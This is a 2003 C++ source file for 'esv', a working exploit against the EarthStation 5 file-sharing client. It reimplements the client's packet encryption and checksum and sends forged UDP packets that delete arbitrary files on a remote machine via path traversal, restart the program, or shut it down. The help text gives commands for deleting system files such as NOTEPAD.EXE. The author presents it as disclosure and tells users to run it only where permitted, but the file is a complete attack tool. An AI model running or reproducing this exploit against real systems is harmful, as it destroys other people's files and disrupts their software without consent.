********** BEGIN esv.cpp ********** /* * esv - "ExploitStation V" or "EarthStation Vulnerabilities" * (C)2003 random nut (randnut@yahoo.com) * All rights reserved. * * This code is released to the public because the people behind ES5 * would claim I lie. Thus, I have no choice but to let everyone * download and run this application to prove that I'm right. Only try * this on computers you're allowed to delete files on, and don't try * this at home kids. */ #include #include #include #include typedef unsigned char uint8; typedef unsigned short uint16; typedef unsigned long uint32; typedef signed char int8; typedef short int16; typedef long int32; uint32 __GetChecksum(const char* buf, int buflen = 0, int uplim = 0x7FFFFFFF, int lowlim = 0) { if (buflen == 0) buflen = (int)strlen(buf); int chksum = 0; for (int i = 0; i < buflen; i++, buf++) chksum ^= *buf << (8*(i&3)); return (uint32)(lowlim + (chksum % (uplim - lowlim + 1))); } uint32 GetChecksum(const char* lpszString) { return __GetChecksum(lpszString) ^ 0x7FFFFFFF; } void InitPacket(uint32* pkt, int size, uint32 packet) { memset(pkt, 0, size); pkt[0x0000/4] = size; pkt[0x0004/4] = 2180; pkt[0x0008/4] = packet; pkt[0x0058/4] = 0x3EFA; } void InitPacket0C(uint32* pkt, uint32 sub_func, const char* lpszString = "", uint32 CheckSum = 0) { InitPacket(pkt, 0x288, 0x0C); pkt[0x007C/4] = sub_func; pkt[0x0080/4] = CheckSum; strncpy((char*)&pkt[0x0088/4], lpszString, 0x200-1); } // IMPORTANT: // If ArraySize isn't a multiple of sizeof(uint32) then the last // bytes starting from pArray[ArraySize] will be overwritten. static void EsvInitEncryptArray(char* pArray, int size, uint32 k) { uint32 d = 0x78B7; uint32* pBuf = (uint32*)pArray; const uint32 c = 0x6AC690C5; const uint32 cl = c & 0xFFFF; const uint32 ch = c >> 0x10; for (int i = 0; i < size; i += 4, pBuf++) { const uint32 old_d = d; d = d * c + k; k = (((old_d >> 0x10) * ch) + (((old_d >> 0x10) * cl) >> 0x10)) + (((old_d & 0xFFFF) * ch) >> 0x10); if (((old_d & 0xFFFF) * cl) >= (uint32)(-(int32)k)) k++; *pBuf = d; } } static void EncryptBuffer(char* pBuf, int size, const char* pArray, int ArraySize) { uint8* pWorkBuf = (uint8*)pBuf; for (int i = 0; i < size; i++, pWorkBuf++) *pWorkBuf ^= (uint8)(pArray[i % ArraySize] ^ i); } static void EsvEncrypt(void* pBuf, int size) { const ArraySize = 0x2F; char Array[(ArraySize + sizeof(uint32) - 1) & ~(sizeof(uint32)-1)]; EsvInitEncryptArray(Array, ArraySize, size); EncryptBuffer((char*)pBuf, size, Array, ArraySize); } int SendPacket(uint32* pkt, uint32 IpAddr, uint16 IpPort, int MaxSendTries) { uint32 dwSize = pkt[0x0000/4]; EsvEncrypt(pkt, dwSize); SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (s == INVALID_SOCKET) { printf("socket() failed\n"); return 0; } for (int i = 0; i < MaxSendTries; i++) { sockaddr_in sa; memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(IpPort); sa.sin_addr.s_addr = htonl(IpAddr); int size = sendto(s, (char*)pkt, dwSize, 0, (sockaddr*)&sa, sizeof(sa)); if (size == SOCKET_ERROR || size != dwSize) { printf("sendto() failed\n"); return 0; } } return 1; } void help() { printf( "/R - Max UDP sendto() retries\n" "/r - Restart remote computer's ES5.exe\n" "/e - Tell remote computer's ES5.exe it's expired\n" "/d - Delete file \n" "/s - Remote computer's shared dir" "(case sensitive.)\n" " Use quotes if path contains spaces.\n" "/i - Remote computer's IP\n" "/p - Remote computer's \"Search Service\" port\n" "\n" "The examples below assume remote ES5.exe is using IP=127.0.0.1" " and port=1234\n" "\n" "Example 1:\n" " esv /r /i 127.0.0.1 /p 1234\n" "This will restart remote computer's ES5.exe.\n" "\n" "Example 2:\n" " esv /e /i 127.0.0.1 /p 1234\n" "This will force remote computer's ES5.exe to stop functioning, " "and let the\n" "user know about it.\n" "\n" "Example 3:\n" " esv /d ..\\..\\..\\WINDOWS\\NOTEPAD.EXE /s " "\"C:\\Program Files\\EarthStation5\\New Media Files\"" " /i 127.0.0.1 /p 1234\n" "This will delete the file \"\\WINDOWS\\NOTEPAD.EXE\". This will " "not work\n" "under Win98 (and probably Win95/WinME) but does work under " "WinXP (and\n" "probably WinNT, Win2000, Win2003)\n" "\n" "Example 4:\n" " esv /d readme.txt /s \"C:\\Program Files\\EarthStation5\\" "New Media Files\" /i 127.0.0.1 /p 1234\n" "This will delete the file \"readme.txt\" in the folder\n" "\"C:\\Program Files\\EarthStation5\\New Media Files\".\n" "and works with all Windows versions\n" "\n" "IMPORTANT:\n" "The shared folder is case sensitive, and you must use the exact " "same path\n" "as ES5.exe does. If path = \"C:\\Program Files\\ES5\\Files\", " "then make sure\n" "that ES5.exe doesn't use the shorter path \"C:\\Progra~1\\ES5" "\\Files\"\n" "or has uppercased all letters. You can find out the exact path in\n" "ES5.exe's settings. Copy and paste that string.\n" ); exit(1); } char* NewDirString(const char* s) { char* szNew = (char*)malloc(strlen(s) + 1 + 1); if (szNew == NULL) return szNew; strcpy(szNew, s); strcat(szNew, "\\"); return szNew; } int main(int argc, char** argv) { int MaxSendTries = 50; // Should be more than enough... uint32 IpAddr = 0; // Remote comp's IP uint16 IpPort = 0; // Remote comp's Search Service port int RestartOption = 0; // /r option int ExitOption = 0; // /e option int DeleteOption = 0; // /d option const char* lpszSharedDir = NULL; const char* lpszFilename = NULL; uint32 pkt0C[0x0288/4]; for (int i = 1; i < argc; i++) { char* s = argv[i]; if (*s != '/' && *s != '-') help(); s++; if (!strcmp(s, "r")) { RestartOption = 1; } else if (!strcmp(s, "e")) { ExitOption = 1; } else if (!strcmp(s, "d")) { DeleteOption = 1; if (++i >= argc) help(); lpszFilename = argv[i]; } else if (!strcmp(s, "s")) { if (++i >= argc) help(); lpszSharedDir = NewDirString(argv[i]); if (lpszSharedDir == NULL) { printf("Out of memory\n"); return 1; } } else if (!strcmp(s, "i")) { if (++i >= argc) help(); IpAddr = inet_addr(argv[i]); if (IpAddr == INADDR_NONE) help(); IpAddr = ntohl(IpAddr); } else if (!strcmp(s, "p")) { if (++i >= argc) help(); uint32 p = strtoul(argv[i], NULL, 0); if (p == 0 || p > 0xFFFF) help(); IpPort = (uint16)p; } else if (!strcmp(s, "R")) { if (++i >= argc) help(); MaxSendTries = strtoul(argv[i], NULL, 0); } else { help(); } } if (IpAddr == 0 || IpPort == 0) help(); WSAData wsa; int ret; if ((ret = WSAStartup(MAKEWORD(2,2), &wsa)) != 0) { printf("Could not initialize WinSock. Error %08X\n", ret); return 1; } if (wsa.wVersion != 0x0202) { printf("Couldn't init WinSock 2.2\n"); return 1; } int did_something = 0; if (DeleteOption) { if (lpszFilename == NULL || lpszSharedDir == NULL) help(); printf("Sending command to delete file \"%s\" in folder " "\"%s\"...", lpszFilename, lpszSharedDir); InitPacket0C(pkt0C, 0x07, lpszFilename, GetChecksum(lpszSharedDir)); if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries)) return 1; printf("Done!\n"); did_something = 1; } if (RestartOption) { InitPacket0C(pkt0C, 0x2F); printf("Sending command to restart remote ES5.exe..."); if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries)) return 1; printf("Done!\n"); did_something = 1; } if (ExitOption) { InitPacket0C(pkt0C, 0x09); printf("Sending command to close remote ES5.exe..."); if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries)) return 1; printf("Done!\n"); did_something = 1; } if (!did_something) help(); } ********** END esv.cpp **********